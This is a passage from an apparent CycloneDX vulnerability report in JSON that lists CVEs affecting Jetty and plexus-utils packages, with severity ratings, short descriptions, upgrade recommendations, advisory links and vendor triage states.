"urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#097c6059-fc23-4f18-b102-78d1b2498fa7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#2ca102aa-dda0-4615-ba25-0ca3430d0f83" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#22e3dd8c-f4c5-43cd-a8d2-1e900ff01e71" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "There is no confusion between the URI parsing Confluent\u2019s use cases. " } }, { "id": "CVE-2025-67030", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "high" }, { "source": { "name": "cbl-mariner" }, "severity": "high" }, { "source": { "name": "ghsa" }, "severity": "high" }, { "source": { "name": "nvd" }, "score": 8.8, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "source": { "name": "redhat" }, "score": 8.3, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L" } ], "cwes": [ 22 ], "description": "Directory Traversal vulnerability in the extractFile method of org.codehaus.plexus.util.Expand in plexus-utils before 6d780b3378829318ba5c2d29547e0012d5b29642. This allows an attacker to execute arbitrary code", "recommendation": "Upgrade org.codehaus.plexus:plexus-utils to version 4.0.3, 3.6.1", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-67030" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-67030" }, { "url": "https://gist.github.com/weaver4VD/3216dac645220f8c9b488362f61241ec" }, { "url": "https://github.com/codehaus-plexus/plexus-utils" }, { "url": "https://github.com/codehaus-plexus/plexus-utils/commit/6d780b3378829318ba5c2d29547e0012d5b29642" }, { "url": "https://github.com/codehaus-plexus/plexus-utils/issues/294" }, { "url": "https://github.com/codehaus-plexus/plexus-utils/pull/295" }, { "url": "https://github.com/codehaus-plexus/plexus-utils/pull/296" }, { "url": "https://github.com/codehaus-plexus/plexus-utils/releases/tag/plexus-utils-4.0.3" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67030" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-67030" } ], "published": "2026-03-25T18:16:25+00:00", "updated": "2026-05-01T17:12:22+00:00", "affects": [ { "ref": "pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1", "versions": [ { "version": "3.5.1", "status": "affected" } ] }, { "ref": "pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1", "versions": [ { "version": "3.5.1", "status": "affected" } ] }, { "ref": "pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1", "versions": [ { "version": "3.5.1", "status": "affected" } ] }, { "ref": "pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1", "versions": [ { "version": "3.5.1", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4a4dd2bc-6990-48b7-b48d-9942288a9e42" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4a4dd2bc-6990-48b7-b48d-9942288a9e42" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4a4dd2bc-6990-48b7-b48d-9942288a9e42" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#4a4dd2bc-6990-48b7-b48d-9942288a9e42" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0da77a70-84c2-4c08-b69f-eb9b8e0acfbf" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0da77a70-84c2-4c08-b69f-eb9b8e0acfbf" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0da77a70-84c2-4c08-b69f-eb9b8e0acfbf" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0da77a70-84c2-4c08-b69f-eb9b8e0acfbf" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#39ea5250-432d-491e-aa54-a337f40099a0" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#39ea5250-432d-491e-aa54-a337f40099a0" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#39ea5250-432d-491e-aa54-a337f40099a0" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#39ea5250-432d-491e-aa54-a337f40099a0" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#502cc6e1-28cd-4ca4-a16c-bf5c3e5cc622" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#502cc6e1-28cd-4ca4-a16c-bf5c3e5cc622" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#502cc6e1-28cd-4ca4-a16c-bf5c3e5cc622" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#502cc6e1-28cd-4ca4-a16c-bf5c3e5cc622" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#17892aab-697a-4e04-b1b4-5518a64cbf5f" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#17892aab-697a-4e04-b1b4-5518a64cbf5f" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#17892aab-697a-4e04-b1b4-5518a64cbf5f" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#17892aab-697a-4e04-b1b4-5518a64cbf5f" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#04d9e629-0c5d-440c-a143-fe2a188460f5" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#04d9e629-0c5d-440c-a143-fe2a188460f5" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#04d9e629-0c5d-440c-a143-fe2a188460f5" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#04d9e629-0c5d-440c-a143-fe2a188460f5" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#47db02c4-9e3d-41ae-97d8-e0469f054a43" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#47db02c4-9e3d-41ae-97d8-e0469f054a43" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#47db02c4-9e3d-41ae-97d8-e0469f054a43" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#47db02c4-9e3d-41ae-97d8-e0469f054a43" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#26d19541-4fa8-4fa4-877b-8135344ca72a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#26d19541-4fa8-4fa4-877b-8135344ca72a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#26d19541-4fa8-4fa4-877b-8135344ca72a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#26d19541-4fa8-4fa4-877b-8135344ca72a" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.codehaus.plexus/plexus-utils@3.5.1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0768dcff-64d5-44e3-a642-8f0766615eb7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0768dcff-64d5-44e3-a642-8f0766615eb7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0768dcff-64d5-44e3-a642-8f0766615eb7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#0768dcff-64d5-44e3-a642-8f0766615eb7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#3bbbc3e5-4156-4c63-80ef-3f6d5ca10445" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#3bbbc3e5-4156-4c63-80ef-3f6d5ca10445" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#3bbbc3e5-4156-4c63-80ef-3f6d5ca10445" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#3bbbc3e5-4156-4c63-80ef-3f6d5ca10445" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#09b94bbf-4c85-453d-80ef-25955c4f6b67" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#09b94bbf-4c85-453d-80ef-25955c4f6b67" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#09b94bbf-4c85-453d-80ef-25955c4f6b67" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#09b94bbf-4c85-453d-80ef-25955c4f6b67" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-1605", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "ghsa" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 400, 401 ], "description": "In Eclipse Jetty, versions 12.0.0-12.0.31 and 12.1.0-12.0.5, class GzipHandler exposes a vulnerability when a compressed HTTP request, with Content-Encoding: gzip, is processed and the corresponding response is not compressed.\n\n\nThis happens because the JDK Inflater is allocated for decompressing the request, but it is not released because the release mechanism is tied to the compressed response.\nIn this case, since the response is not compressed, the release mechanism does not trigger, causing the leak.", "recommendation": "Upgrade org.eclipse.jetty:jetty-server to version 12.1.6, 12.0.32", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-1605" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-1605" }, { "url": "https://github.com/jetty/jetty.project" }, { "url": "https://github.com/jetty/jetty.project/issues/14260" }, { "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-xxh7-fcf3-rj7f" }, { "url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/79" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1605" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-1605" } ], "published": "2026-03-05T10:15:56+00:00", "updated": "2026-03-06T20:16:49+00:00", "affects": [ { "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "pkg:maven/org.eclipse.jetty/jetty-server@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#33be085a-d448-4df7-bbb6-354c7a055c70" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#33be085a-d448-4df7-bbb6-354c7a055c70" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#33be085a-d448-4df7-bbb6-354c7a055c70" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#33be085a-d448-4df7-bbb6-354c7a055c70" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#9ce5f377-0457-4d47-9ce4-661c817f0792" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#9ce5f377-0457-4d47-9ce4-661c817f0792" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#9ce5f377-0457-4d47-9ce4-661c817f0792" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#9ce5f377-0457-4d47-9ce4-661c817f0792" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#07983817-5fbc-4a39-aba1-139a1ac2292f" }, { "ref": 